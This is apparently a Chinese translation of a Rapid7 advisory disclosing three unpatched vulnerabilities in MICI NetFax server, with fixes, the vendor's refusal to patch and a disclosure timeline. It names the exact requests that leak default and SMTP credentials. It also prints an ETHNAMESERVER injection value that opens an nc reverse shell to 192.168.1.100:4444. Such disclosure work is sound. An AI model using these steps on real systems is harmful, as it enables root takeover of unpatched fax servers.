MICI NetFax服务器产品漏洞（未修复）| Rapid7博客

安娜·卡塔琳娜·奎因
2025年5月29日 | 最后更新于2025年5月30日 | xx分钟阅读时长

在渗透测试过程中，Rapid7在MICI Network有限公司的NetFax服务器版本<3.0.1.0中发现三个漏洞。这些漏洞允许通过认证攻击链实现以root用户身份对设备进行远程代码执行（RCE）。虽然利用需要认证，但应用程序的默认凭证通过发送给客户端的响应以明文形式自动配置，使得可对易受攻击主机进行自动化利用。

Rapid7通过TWCERT作为中介联系供应商。2025年5月2日周五，Rapid7收到TWCERT通知：“…他们（MICI）回应称不会修复该产品中的漏洞”。因此，客户选择在公告发布前停用设备以减轻相关风险。

漏洞详情

CVE-2025-48045：默认凭证泄露 - 中危（6.6）

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:U
CWE-201：向发送数据中插入敏感信息

访问80端口Web应用时，向/client.php发送GET请求，通过自动配置的设置文件泄露默认管理员凭证：

1

GET /client.php?action=getSetupFile

修复建议：不要向客户端暴露用户凭证，应在服务器端处理配置调用。仅向客户端提供必要信息（如应用名称和版本），要求用户在初始访问时重置默认管理员密码。

CVE-2025-48046：存储密码泄露 - 中危（5.3）

CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N
CWE-260：配置文件中的密码

使用凭证审查应用安全时发现，虽然用户界面中的SMTP密码已正确编辑：

1

POST /config.php?action=setSMTPSettings

但通过GET请求访问/config.php的配置文件向用户提供明文密码：

1

GET /config.php?action=getAllSettings

修复建议：不要向客户端暴露用户凭证，在显示给客户端前编辑敏感信息。

CVE-2025-48047：命令注入 - 严重（9.4）

CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
CWE-78：操作系统命令中特殊元素的不当中和（OS命令注入）

位于/test.php端点的服务器测试功能执行如ping等命令。该功能接收发送到配置文件的数椐（如ETHNAMESERVER）：

1

POST /config.php?action=setNetworkSettings

将配置文件更改为包含各种命令，如使用nc二进制文件和whoami的反向shell：

1

ETHNAMESERVER=`whoami`

运行系统测试，确认字符未被清理，导致通过命令注入实现远程代码执行。确认机器上存在mkfifo和nc`二进制文件后，通过这些方法获得反向shell：

1

ETHNAMESERVER=`mkfifo /tmp/f;nc 192.168.1.100 4444 0</tmp/f|/bin/sh 1>/tmp/f`

修复建议：在用于系统命令前正确清理所有输入。虽然许多字符已正确编辑，但`字符未处理。在接受更改前进行服务器端配置设置验证，确认所有参数包含预期内容。处理包含IP地址的字段，确保仅包含有效IP地址。

已创建适用于此攻击路径的Metasploit模块（针对使用默认凭证的完全未认证RCE利用和认证RCE利用），将在即将发布的更新中发布。任何具有设备网络访问权限的恶意行为者均可执行此攻击。

影响

漏洞影响因配置而异。应用泄露默认凭证对未在设置过程中正确更改管理员密码的系统管理员构成风险。Rapid7确定应用在初始登录时似乎未强制或要求更改默认凭证。

未能隐藏连接外部服务的密码可能导致网络服务账户泄露，并对环境中更多资源产生潜在影响。

命令注入漏洞导致对底层系统的管理访问，影响服务器和应用的机密性、可用性和完整性。

供应商声明

多次尝试联系供应商无果后，Rapid7寻求TWCERT协助与供应商沟通。经过多次通信，供应商通过TWCERT表示：

“…他们（MICI）回应称不会修复该产品中的漏洞。他们建议用户不要将产品暴露给外部网络。他们表示将不再回应有关此产品的询问。”

供应商修复

供应商表示不会修补漏洞，并建议用户不要将服务器暴露给互联网。然而，由于漏洞也可从内部网络角度利用并导致对底层服务器的管理访问，Rapid7还建议在审查设备存在对环境的风险后，仅将服务器暴露给严格必要的内部网络。Rapid7建议更改默认设备凭证，并审查为服务集成目的提供给系统的账户凭证相关风险。

客户修复

Rapid7渗透测试团队在客户参与过程中经常发现产品漏洞。发现本披露中概述的漏洞后，团队通知客户并让客户参与与持续披露相关通信的汇报。由于这些通信的性质，客户选择在公告发布前停用设备以减轻已识别风险。

Rapid7客户

InsightVM和Nexpose客户可使用2025年5月28日内容发布中的未认证检查评估对CVE-2025-48045、CVE-2025-48046和CVE-2025-48047的暴露情况。

披露时间线

• 2025年1月：安娜·奎因发现问题
• 2025年1月30日周四：通过联系表初步披露给供应商
• 2025年2月25日周二：通过联系表再次联系供应商
• 2025年3月18日周二：Rapid7联系TWCERT确定供应商参与的正确渠道
• 2025年3月20日周四：TWCERT让Rapid7与供应商联系
• 2025年3月24日周一：Rapid7跟进供应商
• 2025年3月26日周三：Rapid7跟进供应商
• 2025年3月31日周一：Rapid7向TWCERT请求额外协助
• 2025年4月1日周二：TWCERT请求更多信息
• 2025年4月2日周三：TWCERT确认供应商收到漏洞披露信息，并表示供应商将在内部审查后联系
• 2025年4月8日周二：Rapid7跟进供应商和TWCERT，请求2025年4月15日前更新
• 2025年4月22日周二：Rapid7请求更新
• 2025年4月25日周五：TWCERT转达供应商消息，请求在更新版本应用上进行测试。Rapid7向供应商请求受影响产品的其他版本
• 2025年4月29日周二：TWCERT提供NetFax客户端版本进行测试，但漏洞存在于NetFax服务器中，因此客户端无法用于验证目的。Rapid7通知TWCERT，向供应商请求服务器应用版本
• 2025年5月2日周五：TWCERT提供供应商消息，表示供应商不会处理漏洞。供应商建议客户确保设备不外部暴露，并表示不会回应此事进一步询问
• 2025年5月29日周四：本披露

文章标签

漏洞披露、研究实验室

作者

安娜·卡塔琳娜·奎因